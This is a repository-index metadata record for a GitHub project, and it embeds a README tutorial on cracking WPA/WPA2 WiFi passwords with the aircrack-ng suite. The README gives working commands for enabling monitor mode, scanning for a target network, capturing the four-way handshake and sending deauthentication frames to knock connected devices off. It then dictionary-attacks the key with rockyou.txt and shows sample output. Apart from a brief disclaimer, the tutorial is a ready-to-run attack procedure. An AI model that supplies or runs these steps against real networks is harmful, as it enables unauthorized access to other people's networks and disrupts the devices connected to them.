{"id":21536507,"url":"https://github.com/antoniosubasic/wifi-cracking","last_synced_at":"2025-03-17T20:26:39.513Z","repository":{"id":233979029,"uuid":"788123438","full_name":"antoniosubasic/wifi-cracking","owner":"antoniosubasic","description":"cracking WPA/WPA2 secured WiFi networks with the aircrack-ng suite","archived":false,"fork":false,"pushed_at":"2024-10-31T19:34:47.000Z","size":6346,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-24T07:29:44.245Z","etag":null,"topics":["aircrack-ng","cracking","hacking","wifi"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/antoniosubasic.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-04-17T20:22:44.000Z","updated_at":"2024-11-02T03:33:40.000Z","dependencies_parsed_at":"2025-01-24T07:37:28.097Z","dependency_job_id":null,"html_url":"https://github.com/antoniosubasic/wifi-cracking","commit_stats":null,"previous_names":["antonio-subasic/wifi-cracking","antoniosubasic/wifi-cracking"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antoniosubasic%2Fwifi-cracking","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antoniosubasic%2Fwifi-cracking/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antoniosubasic%2Fwifi-cracking/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antoniosubasic%2Fwifi-cracking/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/antoniosubasic","download_url":"https://codeload.github.com/antoniosubasic/wifi-cracking/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244104653,"owners_count":20398715,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aircrack-ng","cracking","hacking","wifi"],"created_at":"2024-11-24T03:19:54.704Z","updated_at":"2025-03-17T20:26:39.494Z","avatar_url":"https://github.com/antoniosubasic.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"cracking WPA/WPA2 secured WiFi networks with the aircrack-ng suite\n\n\u003e \u003cpicture\u003e\n\u003e \u003csource media=\"(prefers-color-scheme: light)\" srcset=\"https://raw.githubusercontent.com/Mqxx/GitHub-Markdown/main/blockquotes/badge/light-theme/warning.svg\"\u003e\n\u003e \u003cimg alt=\"Warning\" src=\"https://raw.githubusercontent.com/Mqxx/GitHub-Markdown/main/blockquotes/badge/dark-theme/warning.svg\"\u003e\n\u003e \u003c/picture\u003e\u003cbr\u003e\n\u003e This guide is for educational purposes only and should not be used for any illegal activities. The author and publisher is not liable for any illegal use.\n\n## Requirements\n\n- [Kali Linux](https://www.kali.org/get-kali)\n- [aircrack-ng suite](https://www.aircrack-ng.org) (pre-installed on Kali Linux)\n- external WiFi adapter with [monitor mode](https://en.wikipedia.org/wiki/Monitor_mode) and packet injection capabilities ([PiAEK AC-1200 mpbs](https://www.amazon.de/PiAEK-Adapter-Wireless-Verl%C3%A4ngerungskabel-Unterst%C3%BCtzung/dp/B08BHY92R4) used in this guide)\n- drivers for the external WiFi adapter ([rtl8812au](dependencies/rtl8812au-5.13.6.tar.gz) used in this guide)\n- linux kernel headers (installed via _package manager_ or [_/pool/main/l/linux/_](https://http.kali.org/kali/pool/main/l/linux/)) - used in this guide:\n - [linux-headers-6.8.11-common_6.8.11-1kali2_all.deb](https://http.kali.org/kali/pool/main/l/linux/linux-headers-6.8.11-common_6.8.11-1kali2_all.deb)\n - [linux-kbuild-6.8.11_6.8.11-1kali2_amd64.deb](https://http.kali.org/kali/pool/main/l/linux/linux-kbuild-6.8.11_6.8.11-1kali2_amd64.deb)\n - [linux-headers-6.8.11-amd64_6.8.11-1kali2_amd64.deb](https://http.kali.org/kali/pool/main/l/linux/linux-headers-6.8.11-amd64_6.8.11-1kali2_amd64.deb)\n\n## Walkthrough\n\n### Enable monitor mode\n\n[Monitor mode](https://en.wikipedia.org/wiki/Monitor_mode) allows the WiFi adapter to capture all WiFi packages in the air. Before enabling monitor mode, make sure the WiFi adapter is connected to the system. Check that, by running `iwconfig`. The adapter should be listed with a name like `wlan0` or `wlan1`:\n\n```bash\nwlan0 unassociated ESSID:\"\" Nickname:\"\u003cWIFI@REALTEK\u003e\"\n Mode:Managed Frequency=2.412 GHz Access Point: Not-Associated\n Sensitivity:0/0\n Retry:off RTS thr:off Fragment thr:off\n Power Management:off\n Link Quality:0 Signal level:0 Noise level:0\n Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0\n Tx excessive retries:0 Invalid misc:0 Missed beacon:0\n```\n\nTo enable monitor mode, we first need to stop processes that might interfere with the adapter:\n\n```bash\nsudo airmon-ng check kill\n```\n\nNext, we can enable monitor mode on the adapter:\n\n```bash\nsudo airmon-ng start wlan0 # replace wlan0 with the name of your adapter\n```\n\n### Look for target network\n\nTo find the target network, we can use `airodump-ng`, which is a tool from the _aircrack-ng_ suite. This tool lists all WiFi networks in the area, including their BSSID, ESSID, channel, etc.:\n\n```bash\nairodump-ng wlan0 # replace wlan0 with the name of your adapter (your adapter might have a different name after enabling monitor mode, to check run iwconfig)\n```\n\n```\nCH 0 ][ Elapsed: 0 s ][ 2024-04-18 18:55\n\nBSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID\n\nAA:AB:AC:AD:AE:AF -99 5 0 0 1 100 WPA2 CCMP PSK myhomenetwork\n```\n\nwrite down the BSSID and channel of the target network.\n\n### Capture handshake\n\nWhen a device connects to a WiFi network, a so-called [handshake](https://medium.com/@hackersprey/wifi-handshake-cf1f3397a5cc) is exchanged between the device and the access point. This handshake can be captured and used to crack the WiFi password. To capture the handshake, we need to run `airodump-ng` again, but this time we need to specify the BSSID and channel of the target network:\n\n```bash\nairodump-ng -d AA:AB:AC:AD:AE:AF -c 1 --write handshake wlan0 # replace AA:AB:AC:AD:AE:AF with the BSSID of the target network, 1 with the channel of the target network and wlan0 with the name of your adapter\n```\n\nthis command starts listening for the handshake. Once a device connects to the target network, the handshake will be captured and saved to a file called `handshake-01.cap`. An indicator will show when the handshake is captured; it will appear on the first line after the date and time (you can safely stop the process with `Ctrl + C` after the handshake was captured):\n\n```\nCH 0 ][ Elapsed: 0 s ][ 2024-04-18 18:55 ][ WPA handshake: AA:AB:AC:AD:AE:AF\n```\n\nOptionally, you can speed up the process by deauthenticating all device currently connected to the target network and forcing them to reconnect and establish a new handshake:\n\n```bash\n# --deauth specifies the number of deauthentications to send (5 in this case)\naireplay-ng --deauth 5 -a AA:AB:AC:AD:AE:AF wlan0 # replace AA:AB:AC:AD:AE:AF with the BSSID of the target network and wlan0 with the name of your adapter\n```\n\n### Crack the password\n\nTo crack the password, we need to use a wordlist. A wordlist is a list of possible passwords that will be tried one by one until the correct password is found. In this guide, we will use the `rockyou.txt` wordlist, which is a popular wordlist that comes pre-installed on Kali Linux. To crack the password, we need to run `aircrack-ng` and specify the wordlist and the captured handshake:\n\n```bash\naircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap\n```\n\n```\n Aircrack-ng 1.7\n\n [00:00:08] 40629/14344392 keys tested (4797.50 k/s)\n\n Time left: 49 minutes, 41 seconds 0.28%\n\n KEY FOUND! [ test1234 ]\n\n\n Master Key : 8F 5D 7E B8 B7 72 54 75 43 E7 BE 33 66 36 DC C6\n C6 99 AB 2B E6 5D C6 C1 40 B8 BD 66 52 A6 4A F4\n\n Transient Key : 32 2B 40 BA 56 02 E0 2D E9 25 B4 89 AE D8 58 5A\n 08 73 1D 09 BD AE 94 B7 ED 14 9F BE 58 B5 30 85\n 65 C1 ED 9C C9 33 08 DA 83 84 99 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n\n EAPOL HMAC : B7 D9 4F 14 7A 29 6F 3E B3 5C F8 E5 C0 F8 E1 EF\n```\n\nAnd Voila! The password was cracked in only **8 seconds** after testing **40629** other passwords. In this case, the password was `test1234`.\n\n## Script automation\n\nBecause the process of capturing the handshake is always the same and can be quite tedious, I've automated the process with a simple [bash script](dump.sh). It takes two parameters:\n\n1. (required) the name of the target network\n1. (optional) the name of the adapter - default: wlan0\n\nit does all the steps until capturing the handshake and throws you directly into the _airodump-ng_ target network sniff. You only have to wait for the handshake to be captured and then run the _aircrack-ng_ command to crack the password.\n\n\u003cbr\u003e\u003cbr\u003e\n\n_credits to:_\n\n\u003e [The Morpheus Tutorials](https://youtu.be/GLmpLeghM2Y)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantoniosubasic%2Fwifi-cracking","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fantoniosubasic%2Fwifi-cracking","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantoniosubasic%2Fwifi-cracking/lists"}